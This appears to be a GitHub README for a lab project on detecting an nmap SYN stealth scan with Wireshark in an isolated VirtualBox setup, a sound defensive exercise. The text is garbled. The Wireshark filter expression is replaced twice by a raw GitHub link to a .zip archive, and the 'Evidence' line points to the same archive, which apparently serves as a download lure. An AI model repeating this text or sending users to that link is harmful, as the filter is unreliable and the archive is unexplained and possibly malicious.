🔬 Project: Simulated Network Reconnaissance Detection (Wireshark Forensics) Status: Complete | Repository: Public This project demonstrates core Network Security Monitoring (NSM) and forensic analysis skills by isolating and analyzing traffic generated by a simulated cyber attack in a controlled lab environment.

🎯 Objective: To detect and analyze the definitive signature of a stealth port scan, proving the ability to perform deep packet inspection (DPI) necessary for threat investigation.

✅ Demonstrated Skills (For Resume): Internal Network Forensics: Performed packet capture using Wireshark installed directly on the Attacker VM, ensuring high fidelity in traffic analysis.

Network Isolation: Successfully configured the lab using VirtualBox Internal Networking to guarantee complete isolation of the attack traffic.

Deep Packet Inspection (DPI): Successfully filtered raw traffic using complex Boolean logic (\texttt{https://raw.githubusercontent.com/Huzaifa3377/Packet-Analysis-Project/master/iridiophore/Packet-Analysis-Project.zip == 1 and https://raw.githubusercontent.com/Huzaifa3377/Packet-Analysis-Project/master/iridiophore/Packet-Analysis-Project.zip == 0}) to isolate malicious activity.

Intrusion Detection: Identified the signature of a TCP SYN Stealth Scan (\texttt{nmap -sS}).

🛠️ Lab Environment Details Attacker (Scanner): Kali Linux (IP: \texttt{192.168.100.20})

Victim (Vulnerable Host): Metasploitable 2 (IP: \texttt{192.168.100.10})

Networking Mode: VirtualBox Internal Network (Isolated, VM-to-VM only)

Capture Interface: \texttt{eth0} (Wireshark run on Attacker VM)

Evidence: \texttt{https://raw.githubusercontent.com/Huzaifa3377/Packet-Analysis-Project/master/iridiophore/Packet-Analysis-Project.zip} (Attached in repository)